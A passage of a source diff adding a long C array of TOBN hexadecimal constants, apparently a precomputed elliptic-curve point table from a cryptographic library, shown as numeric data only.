+     TOBN(0x755e5551, 0x7d234afb), TOBN(0x61c2db4e, 0x7e208fc1),
+     TOBN(0xaa9859ce, 0xf28a4b5d), TOBN(0xbdd6d4fc, 0x34af030f),
+     TOBN(0xd1c4a26d, 0x3be01cb1), TOBN(0x9ba14ffc, 0x243aa07c),
+     TOBN(0xf95cd3a9, 0xb2503502), TOBN(0xe379bc06, 0x7d2a93ab),
+     TOBN(0x3efc18e9, 0xd4ca8d68), TOBN(0x083558ec, 0x80bb412a),
+     TOBN(0xd903b940, 0x9645a968), TOBN(0xa499f0b6, 0x9ba6054f),
+     TOBN(0x208b573c, 0xb8349abe), TOBN(0x3baab3e5, 0x30b4fc1c),
+     TOBN(0x87e978ba, 0xcb524990), TOBN(0x3524194e, 0xccdf0e80),
+     TOBN(0x62711725, 0x7d4bcc42), TOBN(0xe90a3d9b, 0xb90109ba),
+     TOBN(0x3b1bdd57, 0x1323e1e0), TOBN(0xb78e9bd5, 0x5eae1599),
+     TOBN(0x0794b746, 0x9e03d278), TOBN(0x80178605, 0xd70e6297),
+     TOBN(0x171792f8, 0x99c97855), TOBN(0x11b393ee, 0xf5a86b5c),
+     TOBN(0x48ef6582, 0xd8884f27), TOBN(0xbd44737a, 0xbf19ba5f),
+     TOBN(0x8698de4c, 0xa42062c6), TOBN(0x8975eb80, 0x61ce9c54),
+     TOBN(0xd50e57c7, 0xd7fe71f3), TOBN(0x15342190, 0xbc97ce38),
+     TOBN(0x51bda2de, 0x4df07b63), TOBN(0xba12aeae, 0x200eb87d),
+     TOBN(0xabe135d2, 0xa9b4f8f6), TOBN(0x04619d65, 0xfad6d99c),
+     TOBN(0x4a6683a7, 0x7994937c), TOBN(0x7a778c8b, 0x6f94f09a),
+     TOBN(0x8c508623, 0x20a71b89), TOBN(0x241a2aed, 0x1c229165),
+     TOBN(0x352be595, 0xaaf83a99), TOBN(0x9fbfee7f, 0x1562bac8),
+     TOBN(0xeaf658b9, 0x5c4017e3), TOBN(0x1dc7f9e0, 0x15120b86),
+     TOBN(0xd84f13dd, 0x4c034d6f), TOBN(0x283dd737, 0xeaea3038),
+     TOBN(0x197f2609, 0xcd85d6a2), TOBN(0x6ebbc345, 0xfae60177),
+     TOBN(0xb80f031b, 0x4e12fede), TOBN(0xde55d0c2, 0x07a2186b),
+     TOBN(0x1fb3e37f, 0x24dcdd5a), TOBN(0x8d602da5, 0x7ed191fb),
+     TOBN(0x108fb056, 0x76023e0d), TOBN(0x70178c71, 0x459c20c0),
+     TOBN(0xfad5a386, 0x3fe54cf0), TOBN(0xa4a3ec4f, 0x02bbb475),
+     TOBN(0x1aa5ec20, 0x919d94d7), TOBN(0x5d3b63b5, 0xa81e4ab3),
+     TOBN(0x7fa733d8, 0x5ad3d2af), TOBN(0xfbc586dd, 0xd1ac7a37),
+     TOBN(0x282925de, 0x40779614), TOBN(0xfe0ffffb, 0xe74a242a),
+     TOBN(0x3f39e67f, 0x906151e5), TOBN(0xcea27f5f, 0x55e10649),
+     TOBN(0xdca1d4e1, 0xc17cf7b7), TOBN(0x0c326d12, 0x2fe2362d),
+     TOBN(0x05f7ac33, 0x7dd35df3), TOBN(0x0c3b7639, 0xc396dbdf),
+     TOBN(0x0912f5ac, 0x03b7db1c), TOBN(0x9dea4b70, 0x5c9ed4a9),
+     TOBN(0x475e6e53, 0xaae3f639), TOBN(0xfaba0e7c, 0xfc278bac),
+     TOBN(0x16f9e221, 0x9490375f), TOBN(0xaebf9746, 0xa5a7ed0a),
+     TOBN(0x45f9af3f, 0xf41ad5d6), TOBN(0x03c4623c, 0xb2e99224),
+     TOBN(0x82c5bb5c, 0xb3cf56aa), TOBN(0x64311819, 0x34567ed3),
+     TOBN(0xec57f211, 0x8be489ac), TOBN(0x2821895d, 0xb9a1104b),
+     TOBN(0x610dc875, 0x6064e007), TOBN(0x8e526f3f, 0x5b20d0fe),
+     TOBN(0x6e71ca77, 0x5b645aee), TOBN(0x3d1dcb9f, 0x800e10ff),
+     TOBN(0x36b51162, 0x189cf6de), TOBN(0x2c5a3e30, 0x6bb17353),
+     TOBN(0xc186cd3e, 0x2a6c6fbf), TOBN(0xa74516fa, 0x4bf97906),
+     TOBN(0x5b4b8f4b, 0x279d6901), TOBN(0x0c4e57b4, 0x2b573743),
+     TOBN(0x75fdb229, 0xb6e386b6), TOBN(0xb46793fd, 0x99deac27),
+     TOBN(0xeeec47ea, 0xcf712629), TOBN(0xe965f3c4, 0xcbc3b2dd),
+     TOBN(0x8dd1fb83, 0x425c6559), TOBN(0x7fc00ee6, 0x0af06fda),
+     TOBN(0xe98c9225, 0x33d956df), TOBN(0x0f1ef335, 0x4fbdc8a2),
+     TOBN(0x2abb5145, 0xb79b8ea2), TOBN(0x40fd2945, 0xbdbff288),
+     TOBN(0x6a814ac4, 0xd7185db7), TOBN(0xc4329d6f, 0xc084609a),
+     TOBN(0xc9ba7b52, 0xed1be45d), TOBN(0x891dd20d, 0xe4cd2c74),
+     TOBN(0x5a4d4a7f, 0x824139b1), TOBN(0x66c17716, 0xb873c710),
+     TOBN(0x5e5bc141, 0x2843c4e0), TOBN(0xd5ac4817, 0xb97eb5bf),
+     TOBN(0xc0f8af54, 0x450c95c7), TOBN(0xc91b3fa0, 0x318406c5),
+     TOBN(0x360c340a, 0xab9d97f8), TOBN(0xfb57bd07, 0x90a2d611),
+     TOBN(0x4339ae3c, 0xa6a6f7e5), TOBN(0x9c1fcd2a, 0x2feb8a10),
+     TOBN(0x972bcca9, 0xc7ea7432), TOBN(0x1b0b924c, 0x308076f6),
+     TOBN(0x80b2814a, 0x2a5b4ca5), TOBN(0x2f78f55b, 0x61ef3b29),
+     TOBN(0xf838744a, 0xc18a414f), TOBN(0xc611eaae, 0x903d0a86),
+     TOBN(0x94dabc16, 0x2a453f55), TOBN(0xe6f2e3da, 0x14efb279),
+     TOBN(0x5b7a6017, 0x9320dc3c), TOBN(0x692e382f, 0x8df6b5a4),
+     TOBN(0x3f5e15e0, 0x2d40fa90), TOBN(0xc87883ae, 0x643dd318),
+     TOBN(0x511053e4, 0x53544774), TOBN(0x834d0ecc, 0x3adba2bc),
+     TOBN(0x4215d7f7, 0xbae371f5), TOBN(0xfcfd57bf, 0x6c8663bc),
+     TOBN(0xded2383d, 0xd6901b1d), TOBN(0x3b49fbb4, 0xb5587dc3),
+     TOBN(0xfd44a08d, 0x07625f62), TOBN(0x3ee4d65b, 0x9de9b762),}
+    ,
+    {TOBN(0x64e5137d, 0x0d63d1fa), TOBN(0x658fc052, 0x02a9d89f),
+     TOBN(0x48894874, 0x50436309), TOBN(0xe9ae30f8, 0xd598da61),
+     TOBN(0x2ed710d1, 0x818baf91), TOBN(0xe27e9e06, 0x8b6a0c20),
+     TOBN(0x1e28dcfb, 0x1c1a6b44), TOBN(0x883acb64, 0xd6ac57dc),
+     TOBN(0x8735728d, 0xc2c6ff70), TOBN(0x79d6122f, 0xc5dc2235),
+     TOBN(0x23f5d003, 0x19e277f9), TOBN(0x7ee84e25, 0xdded8cc7),
+     TOBN(0x91a8afb0, 0x63cd880a), TOBN(0x3f3ea7c6, 0x3574af60),
+     TOBN(0x0cfcdc84, 0x02de7f42), TOBN(0x62d0792f, 0xb31aa152),
+     TOBN(0x8e1b4e43, 0x8a5807ce), TOBN(0xad283893, 0xe4109a7e),
+     TOBN(0xc30cc9cb, 0xafd59dda), TOBN(0xf65f36c6, 0x3d8d8093),
+     TOBN(0xdf31469e, 0xa60d32b2), TOBN(0xee93df4b, 0x3e8191c8),
+     TOBN(0x9c1017c5, 0x355bdeb5), TOBN(0xd2623185, 0x8616aa28),
+     TOBN(0xb02c83f9, 0xdec31a21), TOBN(0x988c8b23, 0x6ad9d573),
+     TOBN(0x53e983ae, 0xa57be365), TOBN(0xe968734d, 0x646f834e),
+     TOBN(0x9137ea8f, 0x5da6309b), TOBN(0x10f3a624, 0xc1f1ce16),
+     TOBN(0x782a9ea2, 0xca440921), TOBN(0xdf94739e, 0x5b46f1b5),
+     TOBN(0x9f9be006, 0xcce85c9b), TOBN(0x360e70d6, 0xa4c7c2d3),
+     TOBN(0x2cd5beea, 0xaefa1e60), TOBN(0x64cf63c0, 0x8c3d2b6d),
+     TOBN(0xfb107fa3, 0xe1cf6f90), TOBN(0xb7e937c6, 0xd5e044e6),
+     TOBN(0x74e8ca78, 0xce34db9f), TOBN(0x4f8b36c1, 0x3e210bd0),
+     TOBN(0x1df165a4, 0x34a35ea8), TOBN(0x3418e0f7, 0x4d4412f6),
+     TOBN(0x5af1f8af, 0x518836c3), TOBN(0x42ceef4d, 0x130e1965),
+     TOBN(0x5560ca0b, 0x543a1957), TOBN(0xc33761e5, 0x886cb123),
+     TOBN(0x66624b1f, 0xfe98ed30), TOBN(0xf772f4bf, 0x1090997d),
+     TOBN(0xf4e540bb, 0x4885d410), TOBN(0x7287f810, 0x9ba5f8d7),
+     TOBN(0x22d0d865, 0xde98dfb1), TOBN(0x49ff51a1, 0xbcfbb8a3),
+     TOBN(0xb6b6fa53, 0x6bc3012e), TOBN(0x3d31fd72, 0x170d541d),
+     TOBN(0x8018724f, 0x4b0f4966), TOBN(0x79e7399f, 0x87dbde07),
+     TOBN(0x56f8410e, 0xf4f8b16a), TOBN(0x97241afe, 0xc47b266a),
+     TOBN(0x0a406b8e, 0x6d9c87c1), TOBN(0x803f3e02, 0xcd42ab1b),
+     TOBN(0x7f0309a8, 0x04dbec69), TOBN(0xa83b85f7, 0x3bbad05f),
+     TOBN(0xc6097273, 0xad8e197f), TOBN(0xc097440e, 0x5067adc1),
+     TOBN(0x730eafb6, 0x3524ff16), TOBN(0xd7f9b51e, 0x823fc6ce),
+     TOBN(0x27bd0d32, 0x443e4ac0), TOBN(0x40c59ad9, 0x4d66f217),
+     TOBN(0x6c33136f, 0x17c387a4), TOBN(0x5043b8d5, 0xeb86804d),
+     TOBN(0x74970312, 0x675a73c9), TOBN(0x838fdb31, 0xf16669b6),
+     TOBN(0xc507b6dd, 0x418e7ddd), TOBN(0x39888d93, 0x472f19d6),
+     TOBN(0x7eae26be, 0x0c27eb4d), TOBN(0x17b53ed3, 0xfbabb884),
+     TOBN(0xfc27021b, 0x2b01ae4f), TOBN(0x88462e87, 0xcf488682),
+     TOBN(0xbee096ec, 0x215e2d87), TOBN(0xeb2fea9a, 0xd242e29b),
+     TOBN(0x5d985b5f, 0xb821fc28), TOBN(0x89d2e197, 0xdc1e2ad2),
+     TOBN(0x55b566b8, 0x9030ba62), TOBN(0xe3fd41b5, 0x4f41b1c6),
+     TOBN(0xb738ac2e, 0xb9a96d61), TOBN(0x7f8567ca, 0x369443f4),
+     TOBN(0x8698622d, 0xf803a440), TOBN(0x2b586236, 0x8fe2f4dc),
+     TOBN(0xbbcc00c7, 0x56b95bce), TOBN(0x5ec03906, 0x616da680),
+     TOBN(0x79162ee6, 0x72214252), TOBN(0x43132b63, 0x86a892d2),
+     TOBN(0x4bdd3ff2, 0x2f3263bf), TOBN(0xd5b3733c, 0x9cd0a142),
+     TOBN(0x592eaa82, 0x44415ccb), TOBN(0x663e8924, 0x8d5474ea),
+     TOBN(0x8058a25e, 0x5236344e), TOBN(0x82e8df9d, 0xbda76ee6),
+     TOBN(0xdcf6efd8, 0x11cc3d22), TOBN(0x00089cda, 0x3b4ab529),
+     TOBN(0x91d3a071, 0xbd38a3db), TOBN(0x4ea97fc0, 0xef72b925),
+     TOBN(0x0c9fc15b, 0xea3edf75), TOBN(0x5a6297cd, 0xa4348ed3),
+     TOBN(0x0d38ab35, 0xce7c42d4), TOBN(0x9fd493ef, 0x82feab10),
+     TOBN(0x46056b6d, 0x82111b45), TOBN(0xda11dae1, 0x73efc5c3),
+     TOBN(0xdc740278, 0x5545a7fb), TOBN(0xbdb2601c, 0x40d507e6),
+     TOBN(0x121dfeeb, 0x7066fa58), TOBN(0x214369a8, 0x39ae8c2a),
+     TOBN(0x195709cb, 0x06e0956c), TOBN(0x4c9d254f, 0x010cd34b),
+     TOBN(0xf51e13f7, 0x0471a532), TOBN(0xe19d6791, 0x1e73054d),
+     TOBN(0xf702a628, 0xdb5c7be3), TOBN(0xc7141218, 0xb24dde05),
+     TOBN(0xdc18233c, 0xf29b2e2e), TOBN(0x3a6bd1e8, 0x85342dba),
+     TOBN(0x3f747fa0, 0xb311898c), TOBN(0xe2a272e4, 0xcd0eac65),
+     TOBN(0x4bba5851, 0xf914d0bc), TOBN(0x7a1a9660, 0xc4a43ee3),
+     TOBN(0xe5a367ce, 0xa1c8cde9), TOBN(0x9d958ba9, 0x7271abe3),
+     TOBN(0xf3ff7eb6, 0x3d1615cd), TOBN(0xa2280dce, 0xf5ae20b0),
+     TOBN(0x56dba5c1, 0xcf640147), TOBN(0xea5a2e3d, 0x5e83d118),
+     TOBN(0x04cd6b6d, 0xda24c511), TOBN(0x1c0f4671, 0xe854d214),
+     TOBN(0x91a6b7a9, 0x69565381), TOBN(0xdc966240, 0xdecf1f5b),
+     TOBN(0x1b22d21c, 0xfcf5d009), TOBN(0x2a05f641, 0x9021dbd5),
+     TOBN(0x8c0ed566, 0xd4312483), TOBN(0x5179a95d, 0x643e216f),
+     TOBN(0xcc185fec, 0x17044493), TOBN(0xb3063339, 0x54991a21),
+     TOBN(0xd801ecdb, 0x0081a726), TOBN(0x0149b0c6, 0x4fa89bbb),
+     TOBN(0xafe9065a, 0x4391b6b9), TOBN(0xedc92786, 0xd633f3a3),
+     TOBN(0xe408c24a, 0xae6a8e13), TOBN(0x85833fde, 0x9f3897ab),
+     TOBN(0x43800e7e, 0xd81a0715), TOBN(0xde08e346, 0xb44ffc5f),
+     TOBN(0x7094184c, 0xcdeff2e0), TOBN(0x49f9387b, 0x165eaed1),
+     TOBN(0x635d6129, 0x777c468a), TOBN(0x8c0dcfd1, 0x538c2dd8),
+     TOBN(0xd6d9d9e3, 0x7a6a308b), TOBN(0x62375830, 0x4c2767d3),
+     TOBN(0x874a8bc6, 0xf38cbeb6), TOBN(0xd94d3f1a, 0xccb6fd9e),
+     TOBN(0x92a9735b, 0xba21f248), TOBN(0x272ad0e5, 0x6cd1efb0),
+     TOBN(0x7437b69c, 0x05b03284), TOBN(0xe7f04702, 0x6948c225),
+     TOBN(0x8a56c04a, 0xcba2ecec), TOBN(0x0c181270, 0xe3a73e41),
+     TOBN(0x6cb34e9d, 0x03e93725), TOBN(0xf77c8713, 0x496521a9),
+     TOBN(0x94569183, 0xfa7f9f90), TOBN(0xf2e7aa4c, 0x8c9707ad),
+     TOBN(0xced2c9ba, 0x26c1c9a3), TOBN(0x9109fe96, 0x40197507),
+     TOBN(0x9ae868a9, 0xe9adfe1c), TOBN(0x3984403d, 0x314e39bb),
+     TOBN(0xb5875720, 0xf2fe378f), TOBN(0x33f901e0, 0xba44a628),
+     TOBN(0xea1125fe, 0x3652438c), TOBN(0xae9ec4e6, 0x9dd1f20b),
+     TOBN(0x1e740d9e, 0xbebf7fbd), TOBN(0x6dbd3ddc, 0x42dbe79c),
+     TOBN(0x62082aec, 0xedd36776), TOBN(0xf612c478, 0xe9859039),
+     TOBN(0xa493b201, 0x032f7065), TOBN(0xebd4d8f2, 0x4ff9b211),
+     TOBN(0x3f23a0aa, 0xaac4cb32), TOBN(0xea3aadb7, 0x15ed4005),
+     TOBN(0xacf17ea4, 0xafa27e63), TOBN(0x56125c1a, 0xc11fd66c),
+     TOBN(0x266344a4, 0x3794f8dc), TOBN(0xdcca923a, 0x483c5c36),
+     TOBN(0x2d6b6bbf, 0x3f9d10a0), TOBN(0xb320c5ca, 0x81d9bdf3),
+     TOBN(0x620e28ff, 0x47b50a95), TOBN(0x933e3b01, 0xcef03371),
+     TOBN(0xf081bf85, 0x99100153), TOBN(0x183be9a0, 0xc3a8c8d6),
+     TOBN(0x4e3ddc5a, 0xd6bbe24d), TOBN(0xc6c74630, 0x53843795),
+     TOBN(0x78193dd7, 0x65ec2d4c), TOBN(0xb8df26cc, 0xcd3c89b2),
+     TOBN(0x98dbe399, 0x5a483f8d), TOBN(0x72d8a957, 0x7dd3313a),
+     TOBN(0x65087294, 0xab0bd375), TOBN(0xfcd89248, 0x7c259d16),
+     TOBN(0x8a9443d7, 0x7613aa81), TOBN(0x80100800, 0x85fe6584),
+     TOBN(0x70fc4dbc, 0x7fb10288), TOBN(0xf58280d3, 0xe86beee8),
+     TOBN(0x14fdd82f, 0x7c978c38), TOBN(0xdf1204c1, 0x0de44d7b),
+     TOBN(0xa08a1c84, 0x4160252f), TOBN(0x591554ca, 0xc17646a5),
+     TOBN(0x214a37d6, 0xa05bd525), TOBN(0x48d5f09b, 0x07957b3c),
+     TOBN(0x0247cdcb, 0xd7109bc9), TOBN(0x40f9e4bb, 0x30599ce7),
+     TOBN(0xc325fa03, 0xf46ad2ec), TOBN(0x00f766cf, 0xc3e3f9ee),
+     TOBN(0xab556668, 0xd43a4577), TOBN(0x68d30a61, 0x3ee03b93),
+     TOBN(0x7ddc81ea, 0x77b46a08), TOBN(0xcf5a6477, 0xc7480699),
+     TOBN(0x43a8cb34, 0x6633f683), TOBN(0x1b867e6b, 0x92363c60),
+     TOBN(0x43921114, 0x1f60558e), TOBN(0xcdbcdd63, 0x2f41450e),
+     TOBN(0x7fc04601, 0xcc630e8b), TOBN(0xea7c66d5, 0x97038b43),
+     TOBN(0x7259b8a5, 0x04e99fd8), TOBN(0x98a8dd12, 0x4785549a),
+     TOBN(0x0e459a7c, 0x840552e1), TOBN(0xcdfcf4d0, 0x4bb0909e),
+     TOBN(0x34a86db2, 0x53758da7), TOBN(0xe643bb83, 0xeac997e1),
+     TOBN(0x96400bd7, 0x530c5b7e), TOBN(0x9f97af87, 0xb41c8b52),
+     TOBN(0x34fc8820, 0xfbeee3f9), TOBN(0x93e53490, 0x49091afd),
+     TOBN(0x764b9be5, 0x9a31f35c), TOBN(0x71f37864, 0x57e3d924),
+     TOBN(0x02fb34e0, 0x943aa75e), TOBN(0xa18c9c58, 0xab8ff6e4),
+     TOBN(0x080f31b1, 0x33cf0d19), TOBN(0x5c9682db, 0x083518a7),
+     TOBN(0x873d4ca6, 0xb709c3de), TOBN(0x64a84262, 0x3575b8f0),
+     TOBN(0x6275da1f, 0x020154bb), TOBN(0x97678caa, 0xd17cf1ab),
+     TOBN(0x8779795f, 0x951a95c3), TOBN(0xdd35b163, 0x50fccc08),
+     TOBN(0x32709627, 0x33d8f031), TOBN(0x3c5ab10a, 0x498dd85c),
+     TOBN(0xb6c185c3, 0x41dca566), TOBN(0x7de7feda, 0xd8622aa3),
+     TOBN(0x99e84d92, 0x901b6dfb), TOBN(0x30a02b0e, 0x7c4ad288),
+     TOBN(0xc7c81daa, 0x2fd3cf36), TOBN(0xd1319547, 0xdf89e59f),
+     TOBN(0xb2be8184, 0xcd496733), TOBN(0xd5f449eb, 0x93d3412b),
+     TOBN(0x7ea41b1b, 0x25fe531d), TOBN(0xf9797432, 0x6a1d5646),
+     TOBN(0x86067f72, 0x2bde501a), TOBN(0xf91481c0, 0x0c85e89c),
+     TOBN(0xca8ee465, 0xf8b05bc6), TOBN(0x1844e1cf, 0x02e83cda),
+     TOBN(0xca82114a, 0xb4dbe33b), TOBN(0x0f9f8769, 0x4eabfde2),
+     TOBN(0x4936b1c0, 0x38b27fe2), TOBN(0x63b6359b, 0xaba402df),
+     TOBN(0x40c0ea2f, 0x656bdbab), TOBN(0x9c992a89, 0x6580c39c),
+     TOBN(0x600e8f15, 0x2a60aed1), TOBN(0xeb089ca4, 0xe0bf49df),
+     TOBN(0x9c233d7d, 0x2d42d99a), TOBN(0x648d3f95, 0x4c6bc2fa),
+     TOBN(0xdcc383a8, 0xe1add3f3), TOBN(0xf42c0c6a, 0x4f64a348),
+     TOBN(0x2abd176f, 0x0030dbdb), TOBN(0x4de501a3, 0x7d6c215e),
+     TOBN(0x4a107c1f, 0x4b9a64bc), TOBN(0xa77f0ad3, 0x2496cd59),
+     TOBN(0xfb78ac62, 0x7688dffb), TOBN(0x7025a2ca, 0x67937d8e),
+     TOBN(0xfde8b2d1, 0xd1a8f4e7), TOBN(0xf5b3da47, 0x7354927c),
+     TOBN(0xe48606a3, 0xd9205735), TOBN(0xac477cc6, 0xe177b917),
+     TOBN(0xfb1f73d2, 0xa883239a), TOBN(0xe12572f6, 0xcc8b8357),
+     TOBN(0x9d355e9c, 0xfb1f4f86), TOBN(0x89b795f8, 0xd9f3ec6e),
+     TOBN(0x27be56f1, 0xb54398dc), TOBN(0x1890efd7, 0x3fedeed5),
+     TOBN(0x62f77f1f, 0x9c6d0140), TOBN(0x7ef0e314, 0x596f0ee4),
+     TOBN(0x50ca6631, 0xcc61dab3), TOBN(0x4a39801d, 0xf4866e4f),
+     TOBN(0x66c8d032, 0xae363b39), TOBN(0x22c591e5, 0x2ead66aa),
+     TOBN(0x954ba308, 0xde02a53e), TOBN(0x2a6c060f, 0xd389f357),
+     TOBN(0xe6cfcde8, 0xfbf40b66), TOBN(0x8e02fc56, 0xc6340ce1),
+     TOBN(0xe4957795, 0x73adb4ba), TOBN(0x7b86122c, 0xa7b03805),
+     TOBN(0x63f83512, 0x0c8e6fa6), TOBN(0x83660ea0, 0x057d7804),
+     TOBN(0xbad79105, 0x21ba473c), TOBN(0xb6c50bee, 0xded5389d),
+     TOBN(0xee2caf4d, 0xaa7c9bc0), TOBN(0xd97b8de4, 0x8c4e98a7),
+     TOBN(0xa9f63e70, 0xab3bbddb), TOBN(0x3898aabf, 0x2597815a),
+     TOBN(0x7659af89, 0xac15b3d9), TOBN(0xedf7725b, 0x703ce784),
+     TOBN(0x25470fab, 0xe085116b), TOBN(0x04a43375, 0x87285310),
+     TOBN(0x4e39187e, 0xe2bfd52f), TOBN(0x36166b44, 0x7d9ebc74),
+     TOBN(0x92ad433c, 0xfd4b322c), TOBN(0x726aa817, 0xba79ab51),
+     TOBN(0xf96eacd8, 0xc1db15eb), TOBN(0xfaf71e91, 0x0476be63),
+     TOBN(0xdd69a640, 0x641fad98), TOBN(0xb7995918, 0x29622559),
+     TOBN(0x03c6daa5, 0xde4199dc), TOBN(0x92cadc97, 0xad545eb4),
+     TOBN(0x1028238b, 0x256534e4), TOBN(0x73e80ce6, 0x8595409a),
+     TOBN(0x690d4c66, 0xd05dc59b), TOBN(0xc95f7b8f, 0x981dee80),
+     TOBN(0xf4337014, 0xd856ac25), TOBN(0x441bd9dd, 0xac524dca),
+     TOBN(0x640b3d85, 0x5f0499f5), TOBN(0x39cf84a9, 0xd5fda182),
+     TOBN(0x04e7b055, 0xb2aa95a0), TOBN(0x29e33f0a, 0x0ddf1860),
+     TOBN(0x082e74b5, 0x423f6b43), TOBN(0x217edeb9, 0x0aaa2b0f),
+     TOBN(0x58b83f35, 0x83cbea55), TOBN(0xc485ee4d, 0xbc185d70),
+     TOBN(0x833ff03b, 0x1e5f6992), TOBN(0xb5b9b9cc, 0xcf0c0dd5),
+     TOBN(0x7caaee8e, 0x4e9e8a50), TOBN(0x462e907b, 0x6269dafd),
+     TOBN(0x6ed5cee9, 0xfbe791c6), TOBN(0x68ca3259, 0xed430790),
+     TOBN(0x2b72bdf2, 0x13b5ba88), TOBN(0x60294c8a, 0x35ef0ac4),
+     TOBN(0x9c3230ed, 0x19b99b08), TOBN(0x560fff17, 0x6c2589aa),
+     TOBN(0x552b8487, 0xd6770374), TOBN(0xa373202d, 0x9a56f685),
+     TOBN(0xd3e7f907, 0x45f175d9), TOBN(0x3c2f315f, 0xd080d810),
+     TOBN(0x1130e9dd, 0x7b9520e8), TOBN(0xc078f9e2, 0x0af037b5),
+     TOBN(0x38cd2ec7, 0x1e9c104c), TOBN(0x0f684368, 0xc472fe92),
+     TOBN(0xd3f1b5ed, 0x6247e7ef), TOBN(0xb32d33a9, 0x396dfe21),
+     TOBN(0x46f59cf4, 0x4a9aa2c2), TOBN(0x69cd5168, 0xff0f7e41),
+     TOBN(0x3f59da0f, 0x4b3234da), TOBN(0xcf0b0235, 0xb4579ebe),
+     TOBN(0x6d1cbb25, 0x6d2476c7), TOBN(0x4f0837e6, 0x9dc30f08),
+     TOBN(0x9a4075bb, 0x906f6e98), TOBN(0x253bb434, 0xc761e7d1),
+     TOBN(0xde2e645f, 0x6e73af10), TOBN(0xb89a4060, 0x0c5f131c),
+     TOBN(0xd12840c5, 0xb8cc037f), TOBN(0x3d093a5b, 0x7405bb47),
+     TOBN(0x6202c253, 0x206348b8), TOBN(0xbf5d57fc, 0xc55a3ca7),
+     TOBN(0x89f6c90c, 0x8c3bef48), TOBN(0x23ac7623, 0x5a0a960a),
+     TOBN(0xdfbd3d6b, 0x552b42ab), TOBN(0x3ef22458, 0x132061f6),
+     TOBN(0xd74e9bda, 0xc97e6516), TOBN(0x88779360, 0xc230f49e),
+     TOBN(0xa6ec1de3, 0x1e74ea49), TOBN(0x581dcee5, 0x3fb645a2),
+     TOBN(0xbaef2391, 0x8f483f14), TOBN(0x6d2dddfc, 0xd137d13b),
+     TOBN(0x54cde50e, 0xd2743a42), TOBN(0x89a34fc5, 0xe4d97e67),
+     TOBN(0x13f1f5b3, 0x12e08ce5), TOBN(0xa80540b8, 0xa7f0b2ca),
+     TOBN(0x854bcf77, 0x01982805), TOBN(0xb8653ffd, 0x233bea04),
+     TOBN(0x8e7b8787, 0x02b0b4c9), TOBN(0x2675261f, 0x9acb170a),
+     TOBN(0x061a9d90, 0x930c14e5), TOBN(0xb59b30e0, 0xdef0abea),
+     TOBN(0x1dc19ea6, 0x0200ec7d), TOBN(0xb6f4a3f9, 0x0bce132b),
+     TOBN(0xb8d5de90, 0xf13e27e0), TOBN(0xbaee5ef0, 0x1fade16f),
+     TOBN(0x6f406aaa, 0xe4c6cf38), TOBN(0xab4cfe06, 0xd1369815),
+     TOBN(0x0dcffe87, 0xefd550c6), TOBN(0x9d4f59c7, 0x75ff7d39),
+     TOBN(0xb02553b1, 0x51deb6ad), TOBN(0x812399a4, 0xb1877749),
+     TOBN(0xce90f71f, 0xca6006e1), TOBN(0xc32363a6, 0xb02b6e77),
+     TOBN(0x02284fbe, 0xdc36c64d), TOBN(0x86c81e31, 0xa7e1ae61),
+     TOBN(0x2576c7e5, 0xb909d94a), TOBN(0x8b6f7d02, 0x818b2bb0),
+     TOBN(0xeca3ed07, 0x56faa38a), TOBN(0xa3790e6c, 0x9305bb54),
+     TOBN(0xd784eeda, 0x7bc73061), TOBN(0xbd56d369, 0x6dd50614),
+     TOBN(0xd6575949, 0x229a8aa9), TOBN(0xdcca8f47, 0x4595ec28),
+     TOBN(0x814305c1, 0x06ab4fe6), TOBN(0xc8c39768, 0x24f43f16),
+     TOBN(0xe2a45f36, 0x523f2b36), TOBN(0x995c6493, 0x920d93bb),
+     TOBN(0xf8afdab7, 0x90f1632b), TOBN(0x79ebbecd, 0x1c295954),
+     TOBN(0xc7bb3ddb, 0x79592f48), TOBN(0x67216a7b, 0x5f88e998),
+     TOBN(0xd91f098b, 0xbc01193e), TOBN(0xf7d928a5, 0xb1db83fc),
+     TOBN(0x55e38417, 0xe991f600), TOBN(0x2a91113e, 0x2981a934),
+     TOBN(0xcbc9d648, 0x06b13bde), TOBN(0xb011b6ac, 0x0755ff44),
+     TOBN(0x6f4cb518, 0x045ec613), TOBN(0x522d2d31, 0xc2f5930a),
+     TOBN(0x5acae1af, 0x382e65de), TOBN(0x57643067, 0x27bc966f),
+     TOBN(0x5e12705d, 0x1c7193f0), TOBN(0xf0f32f47, 0x3be8858e),
+     TOBN(0x785c3d7d, 0x96c6dfc7), TOBN(0xd75b4a20, 0xbf31795d),
+     TOBN(0x91acf17b, 0x342659d4), TOBN(0xe596ea34, 0x44f0378f),
+     TOBN(0x4515708f, 0xce52129d), TOBN(0x17387e1e, 0x79f2f585),
+     TOBN(0x72cfd2e9, 0x49dee168), TOBN(0x1ae05223, 0x3e2af239),
+     TOBN(0x009e75be, 0x1d94066a), TOBN(0x6cca31c7, 0x38abf413),
+     TOBN(0xb50bd61d, 0x9bc49908), TOBN(0x4a9b4a8c, 0xf5e2bc1e),
+     TOBN(0xeb6cc5f7, 0x946f83ac), TOBN(0x27da93fc, 0xebffab28),
+     TOBN(0xea314c96, 0x4821c8c5), TOBN(0x8de49ded, 0xa83c15f4),
+     TOBN(0x7a64cf20, 0x7af33004), TOBN(0x45f1bfeb, 0xc9627e10),
+     TOBN(0x878b0626, 0x54b9df60), TOBN(0x5e4fdc3c, 0xa95c0b33),
+     TOBN(0xe54a37ca, 0xc2035d8e), TOBN(0x9087cda9, 0x80f20b8c),
+     TOBN(0x36f61c23, 0x8319ade4), TOBN(0x766f287a, 0xde8cfdf8),
+     TOBN(0x48821948, 0x346f3705), TOBN(0x49a7b853, 0x16e4f4a2),
+     TOBN(0xb9b3f8a7, 0x5cedadfd), TOBN(0x8f562815, 0x8db2a815),
+     TOBN(0xc0b7d554, 0x01f68f95), TOBN(0x12971e27, 0x688a208e),
+     TOBN(0xc9f8b696, 0xd0ff34fc), TOBN(0x20824de2, 0x1222718c),
+     TOBN(0x7213cf9f, 0x0c95284d), TOBN(0xe2ad741b, 0xdc158240),
+     TOBN(0x0ee3a6df, 0x54043ccf), TOBN(0x16ff479b, 0xd84412b3),
+     TOBN(0xf6c74ee0, 0xdfc98af0), TOBN(0xa78a169f, 0x52fcd2fb),
+     TOBN(0xd8ae8746, 0x99c930e9), TOBN(0x1d33e858, 0x49e117a5),
+     TOBN(0x7581fcb4, 0x6624759f), TOBN(0xde50644f, 0x5bedc01d),
+     TOBN(0xbeec5d00, 0xcaf3155e), TOBN(0x672d66ac, 0xbc73e75f),
+     TOBN(0x86b9d8c6, 0x270b01db), TOBN(0xd249ef83, 0x50f55b79),
+     TOBN(0x6131d6d4, 0x73978fe3), TOBN(0xcc4e4542, 0x754b00a1),
